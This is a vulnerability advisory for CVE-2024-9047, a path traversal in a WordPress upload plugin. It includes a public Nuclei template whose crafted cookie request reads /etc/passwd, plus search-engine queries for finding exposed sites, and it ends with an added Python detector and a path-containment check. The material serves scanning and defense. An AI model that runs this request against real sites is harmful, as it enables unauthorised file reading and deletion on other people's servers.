The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
PoC code [public]
id: CVE-2024-9047

info:
  name: WordPress File Upload <= 4.24.11 - Arbitrary File Read
  author: s4e-io
  severity: critical
  description: |
    The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
  reference:
    - https://github.com/iSee857/CVE-2024-9047-PoC
    - https://nvd.nist.gov/vuln/detail/cve-2024-9047
    - https://plugins.trac.wordpress.org/changeset/3164449/wp-file-upload
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=cve
    - https://github.com/wy876/POC
    - https://www.usom.gov.tr/bildirim/tr-24-1670
    - https://sploitus.com/exploit?id=3358E6CC-BC63-56E4-A4C4-1F70903C34D5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9047
    cwe-id: CWE-22
    epss-score: 0.92348
    epss-percentile: 0.99717
  metadata:
    max-request: 1
    vendor: nickolas_bossinas
    product: wordpress-file-upload
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/wp-file-upload/"
    fofa-query: body="/wp-content/plugins/wp-file-upload"
    publicwww-query: /wp-content/plugins/wp-file-upload/
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev

variables:
  file: "{{rand_base(16)}}"
  ticket: "{{rand_base(16)}}"
  upload: "{{rand_base(32)}}"
  upload_more: "{{rand_base(32)}}"
  time: "{{rand_int(1000000000000, 9999999999999)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file={{file}}&ticket={{ticket}}&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_{{upload}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: wp_wpfileupload_{{upload}}={{upload_more}}; wfu_storage_{{file}}=/../../../../../etc/passwd[[name]]; wfu_download_ticket_{{ticket}}={{time}}; wfu_ABSPATH=/;

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(content_type, "application/octet-stream")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100c29218e6d4e46f4c45aa3ab01915470ea18129d5949240e51b6b772495cea86302205e88e3ebc724668eefce21b0b154f03e9358c525167f69106e70a8dceb4a4d0d:922c64590222798bb761d5b6d8e72950
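The template above shows the exploit shape: the download handler is switched to cookie-backed session storage (handler=dboption, dboption_base=cookies) and the client then supplies the file path itself through a wfu_storage_<file> cookie, with wfu_ABSPATH pinned to "/". The following added example is not the plugin's code or the template author's; it parses a raw request of that shape and reports the indicators a WAF rule or log review would key on, and it includes the generic CWE-22 containment check (resolve, then confirm the result still lies under the base directory) that a download handler should apply to any client-supplied path. The sample requests are constructed from the template with its random placeholders replaced by fixed strings; the upload directory path and the treatment of the "[[name]]" suffix as a placeholder token are assumptions.

```python
"""Indicators for CVE-2024-9047-style requests to wfu_file_downloader.php.

Added example, not code from the plugin or the Nuclei template. It parses a
raw HTTP request, checks the query parameters and cookies the PoC relies on,
and applies a path-containment check to every wfu_storage_* cookie value.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

HANDLER_PATH = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
# Assumed upload directory; the real value depends on the WordPress install.
UPLOAD_DIR = "/var/www/html/wp-content/uploads"

# Constructed sample: the template's request with placeholders filled in.
ATTACK_REQUEST = (
    "GET " + HANDLER_PATH + "?file=abcd1234abcd1234&ticket=efgh5678efgh5678"
    "&handler=dboption&session_legacy=1&dboption_base=cookies"
    "&dboption_useold=0&wfu_cookie=wp_wpfileupload_x HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Cookie: wp_wpfileupload_x=y; "
    "wfu_storage_abcd1234abcd1234=/../../../../../etc/passwd[[name]]; "
    "wfu_download_ticket_efgh5678efgh5678=1700000000000; wfu_ABSPATH=/;\r\n"
    "\r\n"
)

# Constructed benign sample: a download of a file that stays under UPLOAD_DIR.
BENIGN_REQUEST = (
    "GET " + HANDLER_PATH + "?file=k9&ticket=t1&handler=dboption HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Cookie: wfu_storage_k9=report.pdf; wfu_download_ticket_t1=1700000000000\r\n"
    "\r\n"
)


def parse_request(raw):
    """Return (path, query params, cookies) from a raw HTTP/1.1 request."""
    request_line, _, rest = raw.partition("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            cookies[name.strip()] = value.strip()
    return url.path, params, cookies


def cookie_path_escapes(base, value):
    """True when a client-supplied path resolves outside `base`.

    Generic CWE-22 containment check, not the plugin's patched logic. Joining
    an absolute value discards `base`, and normpath collapses "..", so both
    traversal styles end up compared against the base prefix. The "[[name]]"
    suffix from the PoC is treated as a placeholder token (assumption).
    """
    value = value.split("[[", 1)[0]
    resolved = posixpath.normpath(posixpath.join(base, value))
    base = posixpath.normpath(base)
    return not (resolved == base or resolved.startswith(base + "/"))


def find_indicators(raw):
    """List the CVE-2024-9047 indicators present in a raw request."""
    path, params, cookies = parse_request(raw)
    if not path.endswith(HANDLER_PATH):
        return []
    found = []
    if params.get("handler") == "dboption" and params.get("dboption_base") == "cookies":
        found.append("cookie-backed storage selected (handler=dboption, dboption_base=cookies)")
    for name, value in cookies.items():
        if name.startswith("wfu_storage_") and cookie_path_escapes(UPLOAD_DIR, value):
            found.append(f"{name} escapes the upload directory: {value}")
    if "wfu_ABSPATH" in cookies:
        found.append(f"client-supplied wfu_ABSPATH={cookies['wfu_ABSPATH']}")
    return found


if __name__ == "__main__":
    for label, req in (("attack", ATTACK_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, find_indicators(req))
```

The benign request yields no indicators even though it uses handler=dboption, because the storage cookie resolves inside the upload directory and neither dboption_base=cookies nor wfu_ABSPATH is present; a rule that keys only on the handler path would be noisy on normal downloads.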